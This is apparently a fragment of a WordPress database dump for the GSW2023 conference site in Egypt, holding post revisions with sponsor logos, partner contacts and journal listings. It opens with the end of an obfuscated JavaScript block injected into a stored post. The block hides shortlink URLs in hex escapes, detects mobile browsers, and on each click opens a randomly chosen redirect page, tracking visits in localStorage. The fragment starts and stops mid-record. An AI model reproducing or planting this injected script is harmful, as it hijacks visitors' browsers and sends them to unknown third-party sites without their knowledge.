_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 23:58:51','2023-08-15 23:58:51','',3066,'https://gsw2023.com/?p=5230',0,'revision','',0),
(5231,1,'2023-08-16 00:00:38','2023-08-16 00:00:38','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692141731843{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692141731943{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a 